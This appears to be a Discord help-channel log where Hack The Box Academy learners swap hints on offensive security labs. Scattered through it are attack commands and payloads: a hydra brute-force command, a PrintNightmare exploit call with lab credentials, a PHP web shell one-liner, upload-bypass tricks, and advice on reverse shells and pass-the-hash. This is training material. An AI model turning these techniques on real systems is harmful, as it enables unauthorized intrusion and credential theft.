Hi, can someone give me some guidance on the Firewall and IDS/IPS Evasion - Hard lab? I've tried to use "--source-port 53" to get past the firewall to get to port 50000. Once I did that I used Ncat to try and grab the banner but it keeps returning "permission denied". Am I using the wrong ports or am I on the right track?
Yes you are
Try to grab the banner of the service on 5000 again using the (trusted) DNS server as source port it should work
thanks for the guidance, I am getting a connection using "nc -nv --source-port 53 [ip] 80" but no banner. is this the correct command because I'm not sure what you mean by "trusted DNS"
No its not correct
Here you are grabbing the banner of the HTTP service which I cant even recall was running
The aim is to grab the banner of the service running behind the port 5000 so ||ncat -nv --source-port 53 $IP 5000|| Trusted in the sense that the service going to show as filtered(behind a firewall), you would need to sorta DNS proxy with the source port of a DNS server (which the server would think is the internal DNS server) and allow you port scan or banner grab that very filtered service. Please correct me if I am wrong lol
That sounds about right in terms of what we are trying to accomplish, but nevertheless the command simply returns a permission denied followed by a timeout
I've read online people have had success on their own parrot systems so I will try that
alright
Also from what I noticed some attacks/techniques work better on the pwnbox, Hope it helps!
yeah i think you should contact support for that
HTB academy is a separate account
Are you running that command with sudo?
Try adding any of the injection operators after the ip in IP field. What did the error message say (in English)?
I have no error message
oh ok i just found it i was supposed to use the input of the website
Solutions disappeared for anyone else? (Enterprise academy - Penetration Tester job role path)
reach out to support
yeah have done and waiting on a response. Just wondered if it was system wide
why do you feel that you need a tgs to continue?
this is not the only thing that you can do
Not very helpful, but I'm stuck at exactly the same exercise. I would also appreciate a nudge in the right direction.
you are on the right track to be honest, however, do not over complicate the things when it is not necessary
basically the hint is more enum, I recommend bloodhound also. Even with the spoiler tag that's literally the answer for one of the questions (the username), so can you just remove that?
What rights does generic all give you for groups?
Hey everyone. Having an issue with one of the Academy exercises. HTTP Fundamentals -> HTTP Requests and Responses -> Question 2 at the bottom of the page. I've got the version number, but it's not accepting it.
Anyone else having this issue?
I pulled the same version via Firefox as well as via curl -v.
let's not discuss an assessment
you literally can use the command from the example in cURL
That's the thing though, I'm using the version number that's displayed. Won't say it here obviously.
its a tier 0 module, so go ahead
Sent you a PM
Hey there, I am currently on ATTACKING COMMON SERVICES, section Attacking DNS. For some reason I cannot find anything related to inlanefreight.htb. I added all the IPs and names to /etc/hosts, but any dig attempts just come back empty.
Am I supposed to do anything extra considering the domain is on p53?
What obvious thing am i missing 😄
Has anyone done the skills assessments on Introduction to Deserialization Attacks?
I need help with Zap fuzzer in web proxies.
I manage to get the usernames as md5 hash but I dont know how to turn them into the flag
who finished Active Directory - Skills Assessment II ?
Active directory attacks module
Hi all, I am stuck in the Credential Hunting in Linux section. I got the ssh login for kira. But after that I am lost on how to get will's password. Any hints? Can the notes.zip be cracked? Thank you~
did you try a dns zone transfer or some tools like gobuster or the recommended tool?
which section are you on? also i think i do that one in burp
sure what's the issue?
hint that file is for a later section and to get to the will user hint check his home directory
I manage to get the usernames into md5 hash, then I edit the cookie and send but I cant get it to work
yeah my note for this in zap is a mess but burp is so much better for this
I dont like this at all, and the descriptions what to do in the "academy" is terrible
can you point me in the direction in burp then
in burp intruder "Add" the cookie and in the Payloads tab, go to Payload Processing section and click "Add" and choose Hash > MD5
from the getting started module?
Tried just now but. I have the target and then have added the cookie beneath. Using the top-usernames-shortlist.txt and also md-5 hash but nothing is happening
I just get a first line with "baseline request" and then nothing more
so there is a chance of you doing something wrong
I'm pretty sure I'm doing something wrong, I just dont know what :p
Its not even supposed to be that hard. I mentioned up steps above, what could be wrong?
you are sure that you have selected the cookie that you need to brute force and you have selected the appropriate processor
I am on skills assessment part II, I got the first credentials and logged in to MS01
but for question #4 and #5 I am stuck
capture the request with a cookie, brute force the cookie using the wordlist while using the processor and you get the flag
I am trying to bruteforce it and it looks like I've applied it correctly, but obviously I haven't
if you check the congrats page of the module there's a list of boxes
The list of boxes though is generally retired boxes
take a 2-3 minute break, start from scratch and you will get it
do something funny for span of the break
or watch something funny
sorry for the delay but everything is super slow right now on my end for some F ing reason and i'm still trying to get burp to load so give me a sec
did you read the hint on question 4?
there is no hint
its part 2
"Use a common method to obtain weak credentials for another user"
my note said there is let me give that a cred
oh wait that is the hint in my note
its the actual question
so there is "weak credentials" and hint the cred was showed in previous section
no idea why i put that as a hint in my note, i guess the question kinda hint the answer
yep just give it a test run and it's worked just fine for me
so when you run it nothing change for the length for all request?
let's not forget that this isn't a tier 0 module
oh spoiler?
everything and even a bit beyond to solve the exercise is either here and especially in the section of the module
Im running another attack and I see nothing
im running it towards ip:port/skills/
Like it says
so this is not allowed?
i mean you are literally pasting out the solution
shoot me a dm with your output
even the solution to be in the section of the module
still, they need to practice rather than to rely on someone else to give them the exact instructions
yes I know the solution but im doing something wrong along the way
and ive been at this for 4 hours now so its just a waste of time for everyone at this point
as I told you, take a break, it tends to help
it is not a hard exercise, just be calm and take your time to explain each and every step to you first
then try to compare it in the section with the examples and see where you might have been doing something wrong
also, do not forget that learning from mistakes (big or small ones) helps you tremendously
Hi
Has anyone completed the blind sqli module? I’m absolutely stuck on the final assessment. Any one I can chat with?
so when the instructions give you information, but don't tell you where the information comes from...was i supposed to find that part on my own within the previous steps?
hey guys im doing AD Enumeration & Attacks - Skills Assessment Part II
got stuck on Q7.Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host
I managed to login to sql
but when I try to transfer files it doesn't write to disk.
I also tried to impersonate sql users like in the mssql section but couldn't get to read the Administrator desktop files
remove some of the spoilers ^, make sure that the file is written to disk correctly and what else you can do with that file
I'm stuck on the module login brute forcing - login form attacks. I ran the command "hydra -l admin -P /usr/share/wordlists/rockyou.txt -f 139.59.167.73 -s 30966 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"" and got back the login credentials (removed), but the page still isn't letting me login. Is that not the correct login credentials?
seems correct to me, but please remove the credentials, also feel free to issue a reset on the target
I just reset my terminal and now the command isn't running and when I try to go to the webpage, it says connection timed out
if you have issued a reset on the target, then there will be a new IP
Is it normal for the sqlmap labs to be so slow?
depends on the type of an attack you are doing and the parameters that you have specified
It keeps complaining about the connection timing out
I was having trouble with them yesterday when trying to use Kali over openvpn. I switched over to using the pwnbox and it was better. Not great, but enough to finish the labs.
Thanks I'll try that next
Question about Password Attacks Lab - Hard.
Should I start by brute forcing winrm with johanna or start somewhere else?
in Active directory Miscellaneous Misconfigurations part .. printNightmare exploit code on the machine gives me The network path was not found. and I don't actually find entries in the logs of any trying to access that path
The command I send is -> sudo python3 CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@172.16.5.5 '\10.129.126.194\CompData\backupscript.dll'
When I tried to access the smb myself I was able to view that backupscript
I logged in using smbclient
Okay i managed to do it. There's no path between these two subnets. I guess
OK...... I maybe have gone insane.
Has anyone else performed XYZ test on a box in the modules, where the test initially fails.... but after 30 minutes of head smashing try the test again and it works?
Please DM me.
Yes happened to me
Glad I am not the only one... this makes me half way believe I am not doing anything right half the time.
all I can say is we have a ton of cool stuff coming so stay tuned 😉
maybe at this event
https://discord.gg/hackthebox?event=1075450015192989716
Nice catch @acoustic owl lol
I am theorizing more game hacking stuff. Bmdyy has written some modules and they have been doing game hacking related stuff on there channel recently
Also there have been a lot of advanced web attack modules released recently which leads me to believe a new skill path? 🤨
Although, game hacking is also quite interesting, seems like it's worth a deep dive into it
This!!
Also more red team stuff please
I want a car pentesting module but that would be kinda hard to do
UPLOAD ATTACKS FINAL ASSESMENTS:
I'm searching a test file cause im getting 404 with everything and can't find it aswell: ||/contact/user_feedback_submissions/230215_test.jpeg||
any help please
I theorize possibly more blue team stuff cuz HTBs main competitor is THM and THM is currently doing better in the blue team area
It worked, thank you! There is always one question that takes the longest.
where are you geographically
spain
oh
server time
fml
Date: Wed, 15 Feb 2023 18:59:09 GMT
shouldnt this be 230215 anyway
@sly reef dm
I think that even gives a Job Role Path.
Probably something like OSWE
hi, could someone help with the Bloodhound module? The zip files contain json files that cannot be opened in Bloodhound, even the pwnbox Bloodhound!! Amazing how outdated that module is. Anyone who knows what version works?
bloodhound is pretty notoriously picky about version differences with its ingestors
either gotta use an older version of bloodhound with something like docker or run new ingestor again(if lab has the targets)
shell & payloads
Ok, I feel pretty stupid because I've been learning Linux basics for a couple of weeks now but I'm totally stuck in the first part of Linux Fundamentals/System Information/"What is the path to the htb-student's mail?". For sure it's super easy and obvious but I can't find the way. I've even tried searching around in other pages and none of the options worked. Help please!
try ||SSHing to the target and then run the "env" command ||
Learning how to look up certificates for websites helps
Are there any modules that teach you powershell well?
hey , need some help in Firewall and IDS/IPS Evasion - Medium Lab , we have to enumerate dns server version , I got the version but it's not accepting , any help would be appreciated
module is related to job-role path
Hello, I am working on "ACTIVE DIRECTORY BLOODHOUND" and I am having a problem importing a .zip file into BloodHound.
I constantly receive the message "BAD JSON FILE" when importing the BloodHound data and have not been able to fix it by running the 2020 version. Is there a way to fix this issue?
@shell marsh I went to look back to see what the answer was to the question since I completed the module. The answer states submit the DNS version number as the answer, however the submitted answer that I have is a flag lol...
help please on xss, phishing, combing, html and xss?? any pointers?
Online Image Viewer
Please login to continue
;document.getElementById('urlform').remove();
which module
xss
phishing section trying to build the script but vasnt get the doc write id part
right there with ya bro, I used XSStrike to get the payload, just can't get the id part to work
how are u friend? did u solve this part as im stuck here same issues? thanks
hello friend, I'm in the same spot, any pointers? I can't remove the getElement part which shows on the page?
hello, I'm in the same boat but the bormoval part. To get rid of document change the single quote to outside....."Login"></form>)'
Madfox looks like he’s trying to help you out so you don’t need to keep pinging people
sorry thank you. where can i see that?
Can I dm you about this?
sure, much appreciated
Stuck on "Password Attacks" > "Protected Files"
I was hoping Kira's credentials were the same as the earlier cracking exercises, but that appears to not be the case. Any nudges on mutation schemas?
In this channel above from 15 minutes ago
Thank you
sure
How is everyone doing ? Recently started HTB
I'm on Hacking WordPress - Skills Assessment. I have every question answered except for "Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download."
Any nudge in the right direction would be appreciated. I've saved the wpscan results but I feel like I'm missing something
Look what plugins are installed and then look for a CVE
Linux Local Privilege Escalation - Skills Assessment: I have gotten flags 1-3, gotten barry's creds and been looking through the logs file for anything of use. For flag4, I am told to look at external services. The two that I see are the apache webserver on port 80 and the tomcat one on 8080. I am assuming I need a way to exploit some vulnerability in these web services?
Jeez. Got it. Ty
try ||hunting for creds 🐱 ||
Am having issues with the www.inlanefreight.com section
Curl www.inlanefreight.com isn't returning the full source code from the site. What can I do?
If you just started the HTTP section, I ran into the same problem. Didn't spawn the VM first. lol
Mine was trying to redirect to a new version
Hey guys and gals, I'm having some trouble with Footprinting module, the IMAP/POP3 section. Is there anybody that can help me understand the ways to solve the last two questions, and especially how does one use imaps (it's driving me insane!)?
finally got help from one of the admins. The imap syntax is a bit crazy. Any advice on how to learn more about using it? and which resources do you mean?
@west canopy aw, I see I didn't try the || default creds route enough ||
I used Google to find a site with the IMAP information I needed
this looks pretty good
https://www.atmail.com/blog/imap-commands/
Thank you!
Is there any way to contact HTB Academy staff about a billing issue? I've been scouring the site for a way to create a help ticket or something similar and I cannot find it
Awesome, I appreciate you
Mod: shells and payloads
sec: Live engagement
second question
so it tells you password for login - then find the upload -tried using wwwolf-php-webshell from previous module. with changing content type to war file. = not working
any pointers?
Hello
what do you mean by not working?
if I am not mistaken you should upload war file to apache tomcat without any issue
im using the script from the previous module https://github.com/WhiteWinterWolf/wwwolf-php-webshell/blob/master/webshell.php and from previous module ya just select that then change content-type to image/gif but for this is war file required so changed to war etc. - errors
so do you need help with anything? or just want to send the friend request
Hi all
I am stuck in the Footprinting easy section as I used the wget command to get the files but the files are not downloading, it always shows "trying to connect". The same thing has happened for a week.
Please help me.
Thanks
that shell kinda suck ass try the java/jsp_shell_reverse_tcp shell in metasploit or even the default one at /usr/share/davtest/backdoors/jsp_win_cmd.jsp will work just fine
if you are in the ||ftp|| stop using wget use the ||ftp|| tool
and use the get command to download file
I also use this way... but still can't find the flag in ids-rsa..
and any other files as well..
or am i doing something wrong?
so you think the skill assessment is just login and get the flag?
check war payloads or sth. I dont know what to tell you. It is a bit simpler than what you are doing right now
this is the correct path you found a ssh key and hint ||use it||
yes i got the ssh key.
keys usually open things
What’s the key
the key is 
Lol
File Upload - Whitelist Filters
-
I am following along with the instructions and it shows us that with double extensions we use a certain wordlist, and we are asked as an exercise to fuzz the upload form and see what's whitelisted by the upload form. I've used the exact list several times and I'm not understanding why I'm not seeing anything that is whitelisted by the upload form (I assume it's supposed to show some).
-
After this little exercise it asks us to intercept a normal upload request and modify the file name to shell.jpg.php and insert the contents to
<?php system($_REQUEST['cmd']); ?>
Trying to understand where I might be misapplying what it's asking me to do.
Trying to get some understanding of what I might not be understanding or doing correctly with the scenario, as I've gone through it a couple of times and it's throwing me for a loop even though I'm just copy / pasting along with the steps
Hey need a nudge on Active Directory Enumeration & Attacks skill assessment 1
on the final question.
Think I'm very close but not sure how to connect to the DC01 computer. I have the administrator's NTLM hash. Have not been able to successfully crack the hash though, I'm guessing I need to do some kind of pass the hash. Been trying to do all this from the MS01 RDP window. Trying to pass the hash with mimikatz to dc01 has proven unsuccessful for me so far.
hint try something like evil winrm and using the MS01 as a pivot machine
ok thanks for the hint
i don't remember exactly but i think there is a whitelisted extension somewhere on the target that you can find but that doesn't really matter the thing about this section is the goal is to mimic one of the whitelist extension
so for example if the jpg extension is whitelisted you can try something like php\x00.jpg like the example show
So I'm not actually even doing the "question" for it. Just following along with whats shown.
and hint the section does give you a script to make the wordlist and you can just use that but change or add more or different extension to that script
I'm just walking myself through for understanding and just following along / taking notes through whats shown
etc etc
so are you following the example in the first burp screenshot? (wait nope wrong one)
hint not all example showed is the actual target
so for this it's a form of double extensions but not 100% exactly like the example shows
ok thanks for your help today and yesterday MRtom. Ended up finishing the first assessment. I actually just ended up passing the hash with mimikatz, opening a cmd as the dc01 administrator. Found out the syntax I was using to try to navigate to the DC01 file system from the MS01 cmd shell was incorrect, but another user showed me the correct syntax
np and i guess mimikatz should work because this is just a simple pass the hash to get RCE
but for this you can also use get meterpreter shell on MS01 and use ||autoroute + socks server|| and after that use ||proxychains4 + evil winrm|| to get RCE on DC01
Okay yea I saw some possibilities to try but was confused and had just assume it was showing what we should see/ do /etc
ty for the clarification
👍
will add that to my notes
Or chisel lol
somehow i didn't even touch chisel in offshore 🤣
hi everyone 🙂
@vital adder are you here by chance? just got back and having a slight understanding problem on the same section
I've got the file upload succeeding and am not able to get the requests
so I should be able to just ?cmd=xxx but it's 404ing
this may be the case #modules message
of course
if you upload it using an extension that can't run php code, like an image extension, it will just display the image, in this case the payload
hey can anyone give me a nudge on Skills Assessment - File Inclusion?
i get two types of response sizes while fuzzing the parameter but don't know which one is the correct one. am i on the right track? just for the sanity check
i need help with sqlmap skill assessment
explain a little bit more than that please
how to navigate between panes in tmux?
I tried Ctrl+B followed by the Up arrow to move to the top pane but it's not working.
@vital adder are you not sleeping? Every time I look in here you are helping someone 😅
i don't (i'm a hacker 🤣 )
if you are in the Documentation & Reporting module try all the shown methods
what's the issue?
you got the first part right, but hint: to be able to read the file you need to use a different method
lmao fr
he should be a staff ong
I think he will be, soon enough 😄
Dm if you still need help
yeah.... i did get the offer but it's been over a month without any update
Well wasn't it this month everything happened? Money in the bank account, new stuff on the website, might have slipped through. Ask for an update :p
of course but i still got a lot of plans right now and i may not be able to take the offer unfortunately 😢 but of course i will ask for some info at least after offshore
i got 3 machines left
also mrb3n made that lab (offshore) so i may write a long ass "pentest report" and send him that
Hello everyone,
For the Introduction to Web Applications module, Section 2 (Web Application Layout).
Can anyone give me a clear difference between Client-Server Infrastructure and One Server Infrastructure?
Reading through these modules makes me feel incredibly stupid
I understand pretty well most of what I'm going through...but when I read it I just like fail to understand what it's wanting / asking half the time.
the 2 images about Client-Server and One Server are right next to each other
oh yeah i guess both of them are kinda the same
Thank you!
Hi all
i am stuck in the footprinting easy lab.
i downloaded all the files one by one and i checked each file, but i couldn't find any flag. Any hints please.
i think it's in the id_rsa file but no luck.
please help me
Thanks
again, this is a skill assessment; you can't just download files from the ftp and get the flag. and again, the id_rsa is an ssh key; use the key to log in via ssh
okay i'll try. thanks for your hint.
@vital adder when i tried with key.. it says permission denied.
do we need to provide any other command
i am using ssh -i private key user@ip
did you change the key permissions?
change it to 600
why and where did you get 48 keys?
id_rsa contains 48 keys.
i even tried id_rsa.pub
it doesn't work.
let me try again to id_rsa
i think i am doing something wrong..
@vital adder it's not working even when i selected all as one key and used it.
so what exactly did you do?
id_rsa is a key file which contains 1 key
and id_rsa.pub is the public key which you can't use to login
just use chmod 600 id_rsa and ssh -i id_rsa (username)@(your target ip)
Am having issues with the www.inlanefreight.com section
Curl www.inlanefreight.com isn't returning the full source code from the site. What can I do?
what module and section are you in? and what are you trying to do?
File Contents module
?
Sorry, section!
Linux Fundamentals module
I've answered the 1st and 2nd question buh the 3rd one seems a big blow
After using curl, it doesn't give me the full source code of the inlanefreight website
for that one i have to use 11 tags and i think half of them aren't even shown in that section
i think for this the intended way is to use google
I feel they made an update to the site source code
also how do you know you didn't get the full source code?
Visiting the site via Firefox on the pwnbox, the information on the site was more verbose than what's returned with curl on the terminal
it's the same files which i already explored. is the flag in these files @vital adder
wdym by more verbose? both should be the same but with curl you will get it all at once
I even used -v hoping I'd get the full source code buh nay
-v in curl i think is for verbose and nothing to do with the source code
and so in firefox you use ctrl + U to read the source code and see that it's much longer than curl
Yh... Buh the information shown with the -v switch is a bit more than with just curl. It now shows the request and response headers of the client and server
hint: the flag isn't named flag.txt; you have to find it somewhere on that machine
that isn't more info, it just shows you what it didn't show you before, no more no less
So why is the full source code not on the terminal with curl?
also you can view it in the networking tab
it's the full source code
Ion think so!
so from my kali curl gives me 315 lines and firefox gives me 316 so i guess you are right
same on the pwnbox
yeah hacking isn't easy
Yes, the pwnbox is crazy. Fewer lines on the terminal with curl, and all lines with Ctrl+U. 😩
yes agreed @vital adder
sorry for the delay guys
missing 1 line isn't going to change much. also i'm 90% sure the web code has a space somewhere and curl or your terminal just removes that line of space
if you are new, i suggest you go back to the basics and first learn linux (clearly you don't know how ssh keys work) and learn some basic enum and hacking with hand holding like on tryhackme
even the htb academy i would say isn't for every 100% beginner
i think so you are right @vital adder .
but i still tried this in parallel
Hacking is just fun
You know, getting to figure out stuff and understanding how shit works is just incredible.
so i just double checked and thm unfortunately did remove the getting started or the beginner path (i can't remember the exact name) but i think that path is great for basic hacking
but there is a linux fundamentals module (like the academy) and it is also free like the one from the academy, so if you are new to linux i would recommend you give both that and this module a check https://tryhackme.com/module/linux-fundamentals (this module has 3 rooms and all free)
i think before there were 2 vip ones but they also removed that for some reason
not if it gets frustrating because you don't understand anything that is happening. i've been there before, things just aren't run any more
I feel so sorry for you
the worst thing is when you've got the basics in and go to the next level, it will kick you in the nuts
Buh to me, that's when things get even more exciting to do cos I actually do like challenges a lot!
not when the AV is on 🤣
Hi, I have a general question about active directory and DC compromise, who would be kind and PM chat for a while with me?
the h1 header from the curl command is still showing "301 Moved permanently". Don't know what to do at this point
Can anyone help?
Yes you are right mate. thanks for your very kind assistance. @vital adder
Did you solve this? I'm trapped too 😦
hi guys, i'm stuck on this question in this module: Password Attacks: Pass the Hash.
Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.
I already got all the hashes but i cannot get access to DC01
Could someone help me?
did anyone ever successfully get oracle instant client installed or thc-hydra?
I can't get it working
password - hard lab, guys no jokes, I really don't know what to do. i found johanna's password and found there a .kdbx file. what can i do with it? i cannot crack it. any help?
how did you use it and what did you do? please specify so I might help you
check the cheatsheet, maybe that will help you
i DM you
Hey guys, just for curiosity, in the Footprinting module, the easy lab, is the hint just extra or do you need the info to be able to complete it?
that must be enough
Anybody able to give me a hint what password list to use with Attacking Common Services - Easy
I'm sorry but can you help me with the hard lab in password attacks?
Module Attacking Common Applications, Attacking Tomcat section: I brute forced with the Metasploit module, with the python script and with different lists too. Didn't find credentials. Can anyone help me with this?
Hello! Could someone help me on the skills assessment on pivoting, tunneling and port forwarding? I can xfreerdp with the first user mle*** but i can't with vf****
Hello, anyone can help me with the module AD Enumeration & Attacks - Skills Assessment Part II?
I am stuck on the question: Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.
Nevermind fixed it, for anyone stuck here, use the DomainPasswordSpray learned from the module 🙂
Did you run it as root?
Hey @livid bluff how do you make those code window things in the chat?
guys, nobody that can help?
Its crackable. Try with a ||mutated list||.
You asked to find the apache version, not to fuzz a subdomain
make sure to add those vHosts (domains/subdomains) to your hosts file in order for you to be able to resolve them, e.g. to be able to open them in your browser
Got it, thanks a bunch!
@sweet heron Can I DM you regarding this one? I have the same problem
DM !
Hi, can anyone tell me which laptop is best to start learning hacking??
really any laptop will do, I have used several different ones. The big difference will be password cracking. A powerful GPU will make that go a lot faster but it is not absolutely critical. I have a small Acer that I started on with a 10" screen. It was not very powerful at all but I was able to do almost anything I needed with it.
need a nudge on Pivoting, Tunneling, and Port Forwarding Skill Assessment
One thing I've noticed: Be leery of the modules where the exercises at the end of each page are easy. That means the Skills Assessment is gonna wreck your world.
What do you need help with specifically?
No problem!
@west canopy Regarding the flag4.txt issue, realized it's not default creds after searching through the system...
I know, but the problem is I don't know how to transfer it to my machine. I used evil-winrm to download it, but it didn't work out
right its ||not default creds but there are creds in a config file. Think Editable Text Configuration files in Linux.||
ye I found what I need, crafting something now ;D ...
Pretty sure I just ||set up an SMB server using the python program and transferred it to that||
If its linux you can use SCP
or even open a port using http.server module in python3
because you have rdp and access to a browser try updog (https://github.com/sc0tfree/updog)
absolutely grateful to you! I didn't try this one haha, from now on I'll try every single option for sure! thanks!
thanks
it really helped me
Just a note for anyone on the Windows Privilege Escalation module. In the section "SeImpersonate and SeAssignPrimaryToken" the content makes you believe you need to upload the required files to the Windows server. This is not the case. The files already exist in the C:\tools folder. Don't waste time trying to upload lol
I'm struggling with the last two flags on the SMB section of the Footprinting module
what questions?
" Find additional information about the specific share we found previously and submit the customized version of that specific share as the answer." I have looked through every file and ran the commands talked about in the module, I have no idea what a customized version of a share even is.
the second problem is that I can't seem to find the full system path to the specific share. the missing piece is the user. i've googled a lot and used chatgpt but can't figure it out
have you tried rpcclient?
yeah
dm me
kk
If I want to change the root password of a CentOS box I have local access to, do I have to use a CentOS live CD to mount it and use the passwd command?
no but you will need the current root password
That's the problem 🥲
Linux Local Privilege Escalation - Skills Assessment: I am working on flag4, || and was able to log in to the tomcat manager panel and bypass the need for accessing the page from the same machine hosting the server by port forwarding. I used msfvenom to craft a payload and uploaded the shell. However, when I try to go to the directory where the shell is located on the webserver it says access forbidden, weirdly... any help? Thought I should be able to access it since I have the creds. ||
Current psw is lost
